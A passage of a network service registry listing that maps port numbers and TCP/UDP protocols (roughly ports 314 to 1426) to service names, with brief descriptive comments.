opalis-robot 314/udp # dpsi 315/tcp # dpsi 315/udp # decauth 316/tcp # decauth 316/udp # zannet 317/tcp # zannet 317/udp # pip 321/tcp # pip 321/udp # pdap 344/tcp # Prospero Data Access Protocol pdap 344/udp # Prospero Data Access Protocol pawserv 345/tcp # Perf Analysis Workbench pawserv 345/udp # Perf Analysis Workbench zserv 346/tcp # Zebra server zserv 346/udp # Zebra server fatserv 347/tcp # Fatmen Server fatserv 347/udp # Fatmen Server csi-sgwp 348/tcp # Cabletron Management Protocol csi-sgwp 348/udp # Cabletron Management Protocol mftp 349/tcp # mftp 349/udp # matip-type-a 350/tcp # MATIP Type A matip-type-a 350/udp # matip-type-b 351/tcp # MATIP Type B or bhoetty also safetp matip-type-b 351/udp # MATIP Type B or bhoetty dtag-ste-sb 352/tcp # DTAG, or bhoedap4 dtag-ste-sb 352/udp # DTAG, or bhoedap4 ndsauth 353/tcp # ndsauth 353/udp # bh611 354/tcp # bh611 354/udp # datex-asn 355/tcp # datex-asn 355/udp # cloanto-net-1 356/tcp # Cloanto Net 1 cloanto-net-1 356/udp # bhevent 357/tcp # bhevent 357/udp # shrinkwrap 358/tcp # shrinkwrap 358/udp # tenebris_nts 359/tcp # Tenebris Network Trace Service tenebris_nts 359/udp # Tenebris Network Trace Service scoi2odialog 360/tcp # scoi2odialog 360/udp # semantix 361/tcp # semantix 361/udp # srssend 362/tcp # SRS Send srssend 362/udp # SRS Send rsvp_tunnel 363/tcp # rsvp_tunnel 363/udp # aurora-cmgr 364/tcp # aurora-cmgr 364/udp # dtk 365/tcp # Deception Tool Kit (www.all.net) dtk 365/udp # Deception Tool Kit (www.all.net) odmr 366/tcp # odmr 366/udp # mortgageware 367/tcp # mortgageware 367/udp # qbikgdp 368/tcp # qbikgdp 368/udp # rpc2portmap 369/tcp # rpc2portmap 369/udp # codaauth2 370/tcp # codaauth2 370/udp # clearcase 371/tcp # clearcase 371/udp # ulistserv 372/tcp # Unix Listserv ulistserv 372/udp # Unix Listserv legent-1 373/tcp # Legent Corporation (now Computer Associates Intl.) legent-1 373/udp # Legent Corporation (now Computer Associates Intl.) legent-2 374/tcp # Legent Corporation (now Computer Associates Intl.) legent-2 374/udp # Legent Corporation (now Computer Associates Intl.) hassle 375/tcp # hassle 375/udp # nip 376/tcp # Amiga Envoy Network Inquiry Proto nip 376/udp # Amiga Envoy Network Inquiry Proto tnETOS 377/tcp # NEC Corporation tnETOS 377/udp # NEC Corporation dsETOS 378/tcp # NEC Corporation dsETOS 378/udp # NEC Corporation is99c 379/tcp # TIA/EIA/IS-99 modem client is99c 379/udp # TIA/EIA/IS-99 modem client is99s 380/tcp # TIA/EIA/IS-99 modem server is99s 380/udp # TIA/EIA/IS-99 modem server hp-collector 381/tcp # hp performance data collector hp-collector 381/udp # hp performance data collector hp-managed-node 382/tcp # hp performance data managed node hp-managed-node 382/udp # hp performance data managed node hp-alarm-mgr 383/tcp # hp performance data alarm manager hp-alarm-mgr 383/udp # hp performance data alarm manager arns 384/tcp # A Remote Network Server System arns 384/udp # A Remote Network Server System ibm-app 385/tcp # IBM Application ibm-app 385/udp # IBM Application asa 386/tcp # ASA Message Router Object Def. asa 386/udp # ASA Message Router Object Def. aurp 387/tcp # Appletalk Update-Based Routing Pro. aurp 387/udp # Appletalk Update-Based Routing Pro. unidata-ldm 388/tcp # Unidata LDM Version 4 unidata-ldm 388/udp # Unidata LDM Version 4 ldap 389/tcp # Lightweight Directory Access Protocol ldap 389/udp # Lightweight Directory Access Protocol uis 390/tcp # uis 390/udp # synotics-relay 391/tcp # SynOptics SNMP Relay Port synotics-relay 391/udp # SynOptics SNMP Relay Port synotics-broker 392/tcp # SynOptics Port Broker Port synotics-broker 392/udp # SynOptics Port Broker Port dis 393/tcp # Data Interpretation System dis 393/udp # Data Interpretation System embl-ndt 394/tcp # EMBL Nucleic Data Transfer embl-ndt 394/udp # EMBL Nucleic Data Transfer netcp 395/tcp # NETscout Control Protocol netcp 395/udp # NETscout Control Protocol netware-ip 396/tcp # Novell Netware over IP netware-ip 396/udp # Novell Netware over IP mptn 397/tcp # Multi Protocol Trans. Net. mptn 397/udp # Multi Protocol Trans. Net. kryptolan 398/tcp # kryptolan 398/udp # iso-tsap-c2 399/tcp # ISO-TSAP Class 2 iso-tsap-c2 399/udp # ISO-TSAP Class 2 work-sol 400/tcp # Workstation Solutions work-sol 400/udp # Workstation Solutions ups 401/tcp # Uninterruptible Power Supply ups 401/udp # Uninterruptible Power Supply genie 402/tcp # Genie Protocol genie 402/udp # Genie Protocol decap 403/tcp # decap 403/udp # nced 404/tcp # nced 404/udp # ncld 405/tcp # ncld 405/udp # imsp 406/tcp # Interactive Mail Support Protocol imsp 406/udp # Interactive Mail Support Protocol timbuktu 407/tcp # timbuktu 407/udp # prm-sm 408/tcp # Prospero Resource Manager Sys. Man. prm-sm 408/udp # Prospero Resource Manager Sys. Man. prm-nm 409/tcp # Prospero Resource Manager Node Man. prm-nm 409/udp # Prospero Resource Manager Node Man. decladebug 410/tcp # DECLadebug Remote Debug Protocol decladebug 410/udp # DECLadebug Remote Debug Protocol rmt 411/tcp # Remote MT Protocol rmt 411/udp # Remote MT Protocol synoptics-trap 412/tcp # Trap Convention Port synoptics-trap 412/udp # Trap Convention Port smsp 413/tcp # smsp 413/udp # infoseek 414/tcp # infoseek 414/udp # bnet 415/tcp # bnet 415/udp # silverplatter 416/tcp # silverplatter 416/udp # onmux 417/tcp # Meeting maker onmux 417/udp # Meeting maker hyper-g 418/tcp # hyper-g 418/udp # ariel1 419/tcp # ariel1 419/udp # smpte 420/tcp # smpte 420/udp # ariel2 421/tcp # ariel2 421/udp # ariel3 422/tcp # ariel3 422/udp # opc-job-start 423/tcp # IBM Operations Planning and Control Start opc-job-start 423/udp # IBM Operations Planning and Control Start opc-job-track 424/tcp # IBM Operations Planning and Control Track opc-job-track 424/udp # IBM Operations Planning and Control Track icad-el 425/tcp # icad-el 425/udp # smartsdp 426/tcp # smartsdp 426/udp # svrloc 427/tcp # Server Location svrloc 427/udp # Server Location ocs_cmu 428/tcp # ocs_cmu 428/udp # ocs_amu 429/tcp # ocs_amu 429/udp # utmpsd 430/tcp # utmpsd 430/udp # utmpcd 431/tcp # utmpcd 431/udp # iasd 432/tcp # iasd 432/udp # nnsp 433/tcp # Usenet, Network News Transfer nnsp 433/udp # mobileip-agent 434/tcp # mobileip-agent 434/udp # mobilip-mn 435/tcp # mobilip-mn 435/udp # dna-cml 436/tcp # dna-cml 436/udp # comscm 437/tcp # comscm 437/udp # dsfgw 438/tcp # dsfgw 438/udp # dasp 439/tcp # dasp 439/udp # sgcp 440/tcp # sgcp 440/udp # decvms-sysmgt 441/tcp # decvms-sysmgt 441/udp # cvc_hostd 442/tcp # cvc_hostd 442/udp # https 443/tcp # secure http (SSL) https 443/udp # snpp 444/tcp # Simple Network Paging Protocol snpp 444/udp # Simple Network Paging Protocol microsoft-ds 445/tcp # SMB directly over IP microsoft-ds 445/udp # ddm-rdb 446/tcp # ddm-rdb 446/udp # ddm-dfm 447/tcp # ddm-dfm 447/udp # ddm-ssl 448/tcp # ddm-byte ddm-ssl 448/udp # ddm-byte as-servermap 449/tcp # AS Server Mapper as-servermap 449/udp # AS Server Mapper tserver 450/tcp # tserver 450/udp # sfs-smp-net 451/tcp # Cray Network Semaphore server sfs-smp-net 451/udp # Cray Network Semaphore server sfs-config 452/tcp # Cray SFS config server sfs-config 452/udp # Cray SFS config server creativeserver 453/tcp # creativeserver 453/udp # contentserver 454/tcp # contentserver 454/udp # creativepartnr 455/tcp # creativepartnr 455/udp # macon-tcp 456/tcp # macon-udp 456/udp # scohelp 457/tcp # scohelp 457/udp # appleqtc 458/tcp # apple quick time appleqtc 458/udp # apple quick time ampr-rcmd 459/tcp # ampr-rcmd 459/udp # skronk 460/tcp # skronk 460/udp # datasurfsrv 461/tcp # datasurfsrv 461/udp # datasurfsrvsec 462/tcp # datasurfsrvsec 462/udp # alpes 463/tcp # alpes 463/udp # kpasswd5 464/tcp # Kerberos (v5) kpasswd5 464/udp # Kerberos (v5) smtps 465/tcp # smtp protocol over TLS/SSL (was ssmtp) smtps 465/udp # smtp protocol over TLS/SSL (was ssmtp) digital-vrc 466/tcp # digital-vrc 466/udp # mylex-mapd 467/tcp # mylex-mapd 467/udp # photuris 468/tcp # Photuris Key Management photuris 468/udp # rcp 469/tcp # Radio Control Protocol rcp 469/udp # Radio Control Protocol scx-proxy 470/tcp # scx-proxy 470/udp # mondex 471/tcp # mondex 471/udp # ljk-login 472/tcp # ljk-login 472/udp # hybrid-pop 473/tcp # hybrid-pop 473/udp # tn-tl-w1 474/tcp # tn-tl-w2 474/udp # tcpnethaspsrv 475/tcp # tcpnethaspsrv 475/udp # tn-tl-fd1 476/tcp # tn-tl-fd1 476/udp # ss7ns 477/tcp # ss7ns 477/udp # spsc 478/tcp # spsc 478/udp # iafserver 479/tcp # iafserver 479/udp # loadsrv 480/tcp # iafdbase 480/udp # dvs 481/tcp # ph 481/udp # bgs-nsi 482/tcp # xlog 482/udp # ulpnet 483/tcp # ulpnet 483/udp # integra-sme 484/tcp # Integra Software Management Environment integra-sme 484/udp # Integra Software Management Environment powerburst 485/tcp # Air Soft Power Burst powerburst 485/udp # Air Soft Power Burst sstats 486/tcp # avian 486/udp # saft 487/tcp # saft Simple Asynchronous File Transfer saft 487/udp # saft Simple Asynchronous File Transfer gss-http 488/tcp # gss-http 488/udp # nest-protocol 489/tcp # nest-protocol 489/udp # micom-pfs 490/tcp # micom-pfs 490/udp # go-login 491/tcp # go-login 491/udp # ticf-1 492/tcp # Transport Independent Convergence for FNA ticf-1 492/udp # Transport Independent Convergence for FNA ticf-2 493/tcp # Transport Independent Convergence for FNA ticf-2 493/udp # Transport Independent Convergence for FNA pov-ray 494/tcp # pov-ray 494/udp # intecourier 495/tcp # intecourier 495/udp # pim-rp-disc 496/tcp # pim-rp-disc 496/udp # dantz 497/tcp # dantz 497/udp # siam 498/tcp # siam 498/udp # iso-ill 499/tcp # ISO ILL Protocol iso-ill 499/udp # ISO ILL Protocol isakmp 500/tcp # isakmp 500/udp # stmf 501/tcp # stmf 501/udp # asa-appl-proto 502/tcp # asa-appl-proto 502/udp # intrinsa 503/tcp # intrinsa 503/udp # citadel 504/tcp # citadel 504/udp # mailbox-lm 505/tcp # mailbox-lm 505/udp # ohimsrv 506/tcp # ohimsrv 506/udp # crs 507/tcp # crs 507/udp # xvttp 508/tcp # xvttp 508/udp # snare 509/tcp # snare 509/udp # fcp 510/tcp # FirstClass Protocol fcp 510/udp # FirstClass Protocol passgo 511/tcp # passgo 511/udp # exec 512/tcp # BSD rexecd(8) biff 512/udp # comsat login 513/tcp # BSD rlogind(8) who 513/udp # BSD rwhod(8) shell 514/tcp # BSD rshd(8) syslog 514/udp # BSD syslogd(8) printer 515/tcp # spooler (lpd) printer 515/udp # spooler (lpd) videotex 516/tcp # videotex 516/udp # talk 517/tcp # like tenex link, but across talk 517/udp # BSD talkd(8) ntalk 518/tcp # (talkd) ntalk 518/udp # (talkd) utime 519/tcp # unixtime utime 519/udp # unixtime efs 520/tcp # extended file name server route 520/udp # router routed -- RIP ripng 521/tcp # ripng 521/udp # ulp 522/tcp # ulp 522/udp # ibm-db2 523/tcp # ibm-db2 523/udp # ncp 524/tcp # ncp 524/udp # timed 525/tcp # timeserver timed 525/udp # timeserver tempo 526/tcp # newdate tempo 526/udp # newdate stx 527/tcp # Stock IXChange stx 527/udp # Stock IXChange custix 528/tcp # Customer IXChange custix 528/udp # Customer IXChange irc-serv 529/tcp # irc-serv 529/udp # courier 530/tcp # rpc courier 530/udp # rpc conference 531/tcp # chat conference 531/udp # chat netnews 532/tcp # readnews netnews 532/udp # readnews netwall 533/tcp # for emergency broadcasts netwall 533/udp # for emergency broadcasts mm-admin 534/tcp # MegaMedia Admin mm-admin 534/udp # MegaMedia Admin iiop 535/tcp # iiop 535/udp # opalis-rdv 536/tcp # opalis-rdv 536/udp # nmsp 537/tcp # Networked Media Streaming Protocol nmsp 537/udp # Networked Media Streaming Protocol gdomap 538/tcp # gdomap 538/udp # apertus-ldp 539/tcp # Apertus Technologies Load Determination apertus-ldp 539/udp # Apertus Technologies Load Determination uucp 540/tcp # uucpd uucp 540/udp # uucpd uucp-rlogin 541/tcp # uucp-rlogin 541/udp # commerce 542/tcp # commerce 542/udp # klogin 543/tcp # Kerberos (v4/v5) klogin 543/udp # Kerberos (v4/v5) kshell 544/tcp # krcmd Kerberos (v4/v5) kshell 544/udp # krcmd Kerberos (v4/v5) ekshell 545/tcp # Kerberos encrypted remote shell -kfall appleqtcsrvr 545/udp # dhcpv6-client 546/tcp # DHCPv6 Client dhcpv6-client 546/udp # DHCPv6 Client dhcpv6-server 547/tcp # DHCPv6 Server dhcpv6-server 547/udp # DHCPv6 Server afpovertcp 548/tcp # AFP over TCP afpovertcp 548/udp # AFP over UDP idfp 549/tcp # idfp 549/udp # new-rwho 550/tcp # new-who new-rwho 550/udp # new-who cybercash 551/tcp # cybercash 551/udp # deviceshare 552/tcp # deviceshare 552/udp # pirp 553/tcp # pirp 553/udp # rtsp 554/tcp # Real Time Stream Control Protocol rtsp 554/udp # Real Time Stream Control Protocol dsf 555/tcp # dsf 555/udp # remotefs 556/tcp # rfs, rfs_server, Brunhoff remote filesystem remotefs 556/udp # rfs, rfs_server, Brunhoff remote filesystem openvms-sysipc 557/tcp # openvms-sysipc 557/udp # sdnskmp 558/tcp # sdnskmp 558/udp # teedtap 559/tcp # teedtap 559/udp # rmonitor 560/tcp # rmonitord rmonitor 560/udp # rmonitord monitor 561/tcp # monitor 561/udp # chshell 562/tcp # chcmd chshell 562/udp # chcmd snews 563/tcp # snews 563/udp # 9pfs 564/tcp # plan 9 file service 9pfs 564/udp # plan 9 file service whoami 565/tcp # whoami 565/udp # streettalk 566/tcp # banyan-rpc 567/tcp # banyan-rpc 567/udp # ms-shuttle 568/tcp # Microsoft shuttle ms-shuttle 568/udp # Microsoft shuttle ms-rome 569/tcp # Microsoft rome ms-rome 569/udp # Microsoft rome meter 570/tcp # demon meter 570/udp # demon umeter 571/tcp # udemon umeter 571/udp # udemon sonar 572/tcp # sonar 572/udp # banyan-vip 573/tcp # banyan-vip 573/udp # ftp-agent 574/tcp # FTP Software Agent System ftp-agent 574/udp # FTP Software Agent System vemmi 575/tcp # vemmi 575/udp # ipcd 576/tcp # ipcd 576/udp # vnas 577/tcp # vnas 577/udp # ipdd 578/tcp # ipdd 578/udp # decbsrv 579/tcp # decbsrv 579/udp # sntp-heartbeat 580/tcp # sntp-heartbeat 580/udp # bdp 581/tcp # Bundle Discovery Protocol bdp 581/udp # Bundle Discovery Protocol scc-security 582/tcp # scc-security 582/udp # philips-vc 583/tcp # Philips Video-Conferencing philips-vc 583/udp # Philips Video-Conferencing keyserver 584/tcp # keyserver 584/udp # imap4-ssl 585/tcp # IMAP4+SSL (use of 585 is not recommended, imap4-ssl 585/udp # use 993 instead) password-chg 586/tcp # password-chg 586/udp # submission 587/tcp # submission 587/udp # cal 588/tcp # cal 588/udp # eyelink 589/tcp # eyelink 589/udp # tns-cml 590/tcp # tns-cml 590/udp # http-alt 591/tcp # FileMaker, Inc. - HTTP Alternate http-alt 591/udp # FileMaker, Inc. - HTTP Alternate eudora-set 592/tcp # eudora-set 592/udp # http-rpc-epmap 593/tcp # HTTP RPC Ep Map http-rpc-epmap 593/udp # HTTP RPC Ep Map tpip 594/tcp # tpip 594/udp # cab-protocol 595/tcp # cab-protocol 595/udp # smsd 596/tcp # smsd 596/udp # ptcnameservice 597/tcp # PTC Name Service ptcnameservice 597/udp # PTC Name Service sco-websrvrmg3 598/tcp # SCO Web Server Manager 3 sco-websrvrmg3 598/udp # SCO Web Server Manager 3 acp 599/tcp # Aeolon Core Protocol acp 599/udp # Aeolon Core Protocol ipcserver 600/tcp # Sun IPC server ipcserver 600/udp # Sun IPC server urm 606/tcp # Cray Unified Resource Manager urm 606/udp # Cray Unified Resource Manager nqs 607/tcp # nqs 607/udp # sift-uft 608/tcp # Sender-Initiated/Unsolicited File Transfer sift-uft 608/udp # Sender-Initiated/Unsolicited File Transfer npmp-trap 609/tcp # npmp-trap 609/udp # npmp-local 610/tcp # npmp-local 610/udp # npmp-gui 611/tcp # npmp-gui 611/udp # sco-dtmgr 617/tcp # SCO Desktop Administration Server or Arkeia (www.akriea.com) backup software sco-dtmgr 617/udp # SCO Desktop Administration Server qmqp 628/tcp # Qmail Quick Mail Queueing ipp 631/tcp # Internet Printing Protocol -- for one implementation see http://www.cups.org (Common UNIX Printing System) ginad 634/tcp # ginad 634/udp # mount 635/udp # NFS Mount Service ldapssl 636/tcp # LDAP over SSL lanserver 637/tcp # lanserver 637/udp # pcnfs 640/udp # PC-NFS DOS Authentication bwnfs 650/udp # BW-NFS DOS Authentication mac-srvr-admin 660/tcp # MacOS Server Admin mac-srvr-admin 660/udp # MacOS Server Admin doom 666/tcp # doom Id Software doom 666/udp # doom Id Software acap 674/tcp # ACAP server of Communigate (www.stalker.com) resvc 691/tcp # The Microsoft Exchange 2000 Server Routing Service elcsd 704/tcp # errlog copy/server daemon elcsd 704/udp # errlog copy/server daemon silc 706/tcp # Secure Internet Live Conferencing -- http://silcnet.org entrustmanager 709/tcp # EntrustManager - NorTel DES auth network see 389/tcp entrustmanager 709/udp # EntrustManager - NorTel DES auth network see 389/tcp netviewdm1 729/tcp # IBM NetView DM/6000 Server/Client netviewdm1 729/udp # IBM NetView DM/6000 Server/Client netviewdm2 730/tcp # IBM NetView DM/6000 send/tcp netviewdm2 730/udp # IBM NetView DM/6000 send/tcp netviewdm3 731/tcp # IBM NetView DM/6000 receive/tcp netviewdm3 731/udp # IBM NetView DM/6000 receive/tcp sometimes-rpc2 737/udp # Rusersd on my OpenBSD box netcp 740/tcp # NETscout Control Protocol netcp 740/udp # NETscout Control Protocol netgw 741/tcp # netgw 741/udp # netrcs 742/tcp # Network based Rev. Cont. Sys. netrcs 742/udp # Network based Rev. Cont. Sys. flexlm 744/tcp # Flexible License Manager flexlm 744/udp # Flexible License Manager fujitsu-dev 747/tcp # Fujitsu Device Control fujitsu-dev 747/udp # Fujitsu Device Control ris-cm 748/tcp # Russell Info Sci Calendar Manager ris-cm 748/udp # Russell Info Sci Calendar Manager kerberos-adm 749/tcp # Kerberos 5 admin/changepw kerberos-adm 749/udp # Kerberos 5 admin/changepw kerberos 750/tcp # kdc Kerberos (v4) kerberos 750/udp # kdc Kerberos (v4) kerberos_master 751/tcp # Kerberos `kadmin' (v4) kerberos_master 751/udp # Kerberos `kadmin' (v4) qrh 752/tcp # qrh 752/udp # rrh 753/tcp # rrh 753/udp # krb_prop 754/tcp # kerberos/v5 server propagation nlogin 758/tcp # nlogin 758/udp # con 759/tcp # con 759/udp # krbupdate 760/tcp # kreg Kerberos (v4) registration ns 760/udp # kpasswd 761/tcp # kpwd Kerberos (v4) "passwd" rxe 761/udp # quotad 762/tcp # quotad 762/udp # cycleserv 763/tcp # cycleserv 763/udp # omserv 764/tcp # omserv 764/udp # webster 765/tcp # webster 765/udp # phonebook 767/tcp # phone phonebook 767/udp # phone vid 769/tcp # vid 769/udp # cadlock 770/tcp # cadlock 770/udp # rtip 771/tcp # rtip 771/udp # cycleserv2 772/tcp # cycleserv2 772/udp # submit 773/tcp # notify 773/udp # rpasswd 774/tcp # acmaint_dbd 774/udp # entomb 775/tcp # acmaint_transd 775/udp # wpages 776/tcp # wpages 776/udp # wpgs 780/tcp # wpgs 780/udp # hp-collector 781/tcp # hp performance data collector hp-collector 781/udp # hp performance data collector hp-managed-node 782/tcp # hp performance data managed node hp-managed-node 782/udp # hp performance data managed node hp-alarm-mgr 783/tcp # hp performance data alarm manager hp-alarm-mgr 783/udp # hp performance data alarm manager concert 786/tcp # concert 786/udp # controlit 799/tcp mdbs_daemon 800/tcp # mdbs_daemon 800/udp # device 801/tcp # device 801/udp # supfilesrv 871/tcp # SUP server rsync 873/tcp # Rsync server ( http://rsync.samba.org ) accessbuilder 888/tcp # or Audio CD Database accessbuilder 888/udp # sun-manageconsole 898/tcp # Solaris Management Console Java listener (Solaris 8 & 9) ftps-data 989/tcp # ftp protocol, data, over TLS/SSL samba-swat 901/tcp # Samba SWAT tool. Also used by ISS RealSecure. oftep-rpc 950/tcp # Often RPC.statd (on Redhat Linux) rndc 953/tcp # RNDC is used by BIND 9 (& probably other NS) securenetpro-sensor 975/tcp ftps 990/tcp # ftp protocol, control, over TLS/SSL telnets 992/tcp # telnet protocol over TLS/SSL imaps 993/tcp # imap4 protocol over TLS/SSL ircs 994/tcp # irc protocol over TLS/SSL pop3s 995/tcp # POP3 protocol over TLS/SSL xtreelic 996/tcp # XTREE License Server vsinet 996/udp # maitrd 997/tcp # maitrd 997/udp # busboy 998/tcp # puparp 998/udp # garcon 999/tcp # applix 999/udp # Applix ac cadlock 1000/tcp # ock 1000/udp # ufsd 1008/tcp # ufsd # UFS-aware server ufsd 1008/udp # sometimes-rpc1 1012/udp # This is rstatd on my openBSD box netvenuechat 1023/tcp # Nortel NetVenue Notification, Chat, Intercom kdm 1024/tcp # K Display Manager (KDE version of xdm) NFS-or-IIS 1025/tcp # IIS, NFS, or listener RFS remote_file_sharing blackjack 1025/udp # network blackjack LSA-or-nterm 1026/tcp # nterm remote_login network_terminal IIS 1027/tcp ms-lsa 1028/udp # ms-lsa 1029/tcp # iad1 1030/tcp # BBN IAD iad1 1030/udp # BBN IAD iad2 1031/tcp # BBN IAD iad2 1031/udp # BBN IAD iad3 1032/tcp # BBN IAD iad3 1032/udp # BBN IAD netinfo 1033/tcp # Netinfo is apparently on many OS X boxes. OTG-fileshare 1050/tcp # J2EE nameserver, also OTG, also called Disk/Application extender. Could also be MiniCommand backdoor OTGlicenseserv nim 1058/tcp # nim 1058/udp # nimreg 1059/tcp # nimreg 1059/udp # instl_boots 1067/tcp # Installation Bootstrap Proto. Serv. instl_boots 1067/udp # Installation Bootstrap Proto. Serv. instl_bootc 1068/tcp # Installation Bootstrap Proto. Cli. instl_bootc 1068/udp # Installation Bootstrap Proto. Cli. sns_credit 1076/tcp # Shared Network Services (SNS) for Canadian credit card authorizations socks 1080/tcp # socks 1080/udp # ansoft-lm-1 1083/tcp # Anasoft License Manager ansoft-lm-1 1083/udp # Anasoft License Manager ansoft-lm-2 1084/tcp # Anasoft License Manager ansoft-lm-2 1084/udp # Anasoft License Manager xaudio 1103/tcp # Xaserver # X Audio Server kpop 1109/tcp # Pop with Kerberos nfsd-status 1110/tcp # Cluster status info nfsd-keepalive 1110/udp # Client status info msql 1112/tcp # mini-sql server supfiledbg 1127/tcp # SUP debugging cce3x 1139/tcp # ClearCommerce Engine 3.x ( www.clearcommerce.com) nfa 1155/tcp # Network File Access nfa 1155/udp # Network File Access phone 1167/udp # conference calling skkserv 1178/tcp # SKK (kanji input) lupa 1212/tcp # lupa 1212/udp # quicktime 1220/tcp # Apple Darwin and QuickTime Streaming Administration Servers nerv 1222/tcp # SNI R&D network nerv 1222/udp # SNI R&D network hotline 1234/tcp # msg 1241/tcp # remote message server hermes 1248/tcp # hermes 1248/udp # alta-ana-lm 1346/tcp # Alta Analytics License Manager alta-ana-lm 1346/udp # Alta Analytics License Manager bbn-mmc 1347/tcp # multi media conferencing bbn-mmc 1347/udp # multi media conferencing bbn-mmx 1348/tcp # multi media conferencing bbn-mmx 1348/udp # multi media conferencing sbook 1349/tcp # Registration Network Protocol sbook 1349/udp # Registration Network Protocol editbench 1350/tcp # Registration Network Protocol editbench 1350/udp # Registration Network Protocol equationbuilder 1351/tcp # Digital Tool Works (MIT) equationbuilder 1351/udp # Digital Tool Works (MIT) lotusnotes 1352/tcp # Lotus Note lotusnotes 1352/udp # Lotus Note relief 1353/tcp # Relief Consulting relief 1353/udp # Relief Consulting rightbrain 1354/tcp # RightBrain Software rightbrain 1354/udp # RightBrain Software intuitive-edge 1355/tcp # Intuitive Edge intuitive-edge 1355/udp # Intuitive Edge cuillamartin 1356/tcp # CuillaMartin Company cuillamartin 1356/udp # CuillaMartin Company pegboard 1357/tcp # Electronic PegBoard pegboard 1357/udp # Electronic PegBoard connlcli 1358/tcp # connlcli 1358/udp # ftsrv 1359/tcp # ftsrv 1359/udp # mimer 1360/tcp # mimer 1360/udp # linx 1361/tcp # linx 1361/udp # timeflies 1362/tcp # timeflies 1362/udp # ndm-requester 1363/tcp # Network DataMover Requester ndm-requester 1363/udp # Network DataMover Requester ndm-server 1364/tcp # Network DataMover Server ndm-server 1364/udp # Network DataMover Server adapt-sna 1365/tcp # Network Software Associates adapt-sna 1365/udp # Network Software Associates netware-csp 1366/tcp # Novell NetWare Comm Service Platform netware-csp 1366/udp # Novell NetWare Comm Service Platform dcs 1367/tcp # dcs 1367/udp # screencast 1368/tcp # screencast 1368/udp # gv-us 1369/tcp # GlobalView to Unix Shell gv-us 1369/udp # GlobalView to Unix Shell us-gv 1370/tcp # Unix Shell to GlobalView us-gv 1370/udp # Unix Shell to GlobalView fc-cli 1371/tcp # Fujitsu Config Protocol fc-cli 1371/udp # Fujitsu Config Protocol fc-ser 1372/tcp # Fujitsu Config Protocol fc-ser 1372/udp # Fujitsu Config Protocol chromagrafx 1373/tcp # chromagrafx 1373/udp # molly 1374/tcp # EPI Software Systems molly 1374/udp # EPI Software Systems bytex 1375/tcp # bytex 1375/udp # ibm-pps 1376/tcp # IBM Person to Person Software ibm-pps 1376/udp # IBM Person to Person Software cichlid 1377/tcp # Cichlid License Manager cichlid 1377/udp # Cichlid License Manager elan 1378/tcp # Elan License Manager elan 1378/udp # Elan License Manager dbreporter 1379/tcp # Integrity Solutions dbreporter 1379/udp # Integrity Solutions telesis-licman 1380/tcp # Telesis Network License Manager telesis-licman 1380/udp # Telesis Network License Manager apple-licman 1381/tcp # Apple Network License Manager apple-licman 1381/udp # Apple Network License Manager gwha 1383/tcp # GW Hannaway Network License Manager gwha 1383/udp # GW Hannaway Network License Manager os-licman 1384/tcp # Objective Solutions License Manager os-licman 1384/udp # Objective Solutions License Manager atex_elmd 1385/tcp # Atex Publishing License Manager atex_elmd 1385/udp # Atex Publishing License Manager checksum 1386/tcp # CheckSum License Manager checksum 1386/udp # CheckSum License Manager cadsi-lm 1387/tcp # Computer Aided Design Software Inc LM cadsi-lm 1387/udp # Computer Aided Design Software Inc LM objective-dbc 1388/tcp # Objective Solutions DataBase Cache objective-dbc 1388/udp # Objective Solutions DataBase Cache iclpv-dm 1389/tcp # Document Manager iclpv-dm 1389/udp # Document Manager iclpv-sc 1390/tcp # Storage Controller iclpv-sc 1390/udp # Storage Controller iclpv-sas 1391/tcp # Storage Access Server iclpv-sas 1391/udp # Storage Access Server iclpv-pm 1392/tcp # Print Manager iclpv-pm 1392/udp # Print Manager iclpv-nls 1393/tcp # Network Log Server iclpv-nls 1393/udp # Network Log Server iclpv-nlc 1394/tcp # Network Log Client iclpv-nlc 1394/udp # Network Log Client iclpv-wsm 1395/tcp # PC Workstation Manager software iclpv-wsm 1395/udp # PC Workstation Manager software dvl-activemail 1396/tcp # DVL Active Mail dvl-activemail 1396/udp # DVL Active Mail audio-activmail 1397/tcp # Audio Active Mail audio-activmail 1397/udp # Audio Active Mail video-activmail 1398/tcp # Video Active Mail video-activmail 1398/udp # Video Active Mail cadkey-licman 1399/tcp # Cadkey License Manager cadkey-licman 1399/udp # Cadkey License Manager cadkey-tablet 1400/tcp # Cadkey Tablet Daemon cadkey-tablet 1400/udp # Cadkey Tablet Daemon goldleaf-licman 1401/tcp # Goldleaf License Manager goldleaf-licman 1401/udp # Goldleaf License Manager prm-sm-np 1402/tcp # Prospero Resource Manager prm-sm-np 1402/udp # Prospero Resource Manager prm-nm-np 1403/tcp # Prospero Resource Manager prm-nm-np 1403/udp # Prospero Resource Manager igi-lm 1404/tcp # Infinite Graphics License Manager igi-lm 1404/udp # Infinite Graphics License Manager ibm-res 1405/tcp # IBM Remote Execution Starter ibm-res 1405/udp # IBM Remote Execution Starter netlabs-lm 1406/tcp # NetLabs License Manager netlabs-lm 1406/udp # NetLabs License Manager dbsa-lm 1407/tcp # DBSA License Manager dbsa-lm 1407/udp # DBSA License Manager sophia-lm 1408/tcp # Sophia License Manager sophia-lm 1408/udp # Sophia License Manager here-lm 1409/tcp # Here License Manager here-lm 1409/udp # Here License Manager hiq 1410/tcp # HiQ License Manager hiq 1410/udp # HiQ License Manager af 1411/tcp # AudioFile af 1411/udp # AudioFile innosys 1412/tcp # innosys 1412/udp # innosys-acl 1413/tcp # innosys-acl 1413/udp # ibm-mqseries 1414/tcp # IBM MQSeries ibm-mqseries 1414/udp # IBM MQSeries dbstar 1415/tcp # dbstar 1415/udp # novell-lu6.2 1416/tcp # Novell LU6.2 novell-lu6.2 1416/udp # Novell LU6.2 timbuktu-srv1 1417/tcp # Timbuktu Service 1 Port timbuktu-srv1 1417/udp # Timbuktu Service 1 Port timbuktu-srv2 1418/tcp # Timbuktu Service 2 Port timbuktu-srv2 1418/udp # Timbuktu Service 2 Port timbuktu-srv3 1419/tcp # Timbuktu Service 3 Port timbuktu-srv3 1419/udp # Timbuktu Service 3 Port timbuktu-srv4 1420/tcp # Timbuktu Service 4 Port timbuktu-srv4 1420/udp # Timbuktu Service 4 Port gandalf-lm 1421/tcp # Gandalf License Manager gandalf-lm 1421/udp # Gandalf License Manager autodesk-lm 1422/tcp # Autodesk License Manager autodesk-lm 1422/udp # Autodesk License Manager essbase 1423/tcp # Essbase Arbor Software essbase 1423/udp # Essbase Arbor Software hybrid 1424/tcp # Hybrid Encryption Protocol hybrid 1424/udp # Hybrid Encryption Protocol zion-lm 1425/tcp # Zion Software License Manager zion-lm 1425/udp # Zion Software License Manager sas-1 1426/tcp # 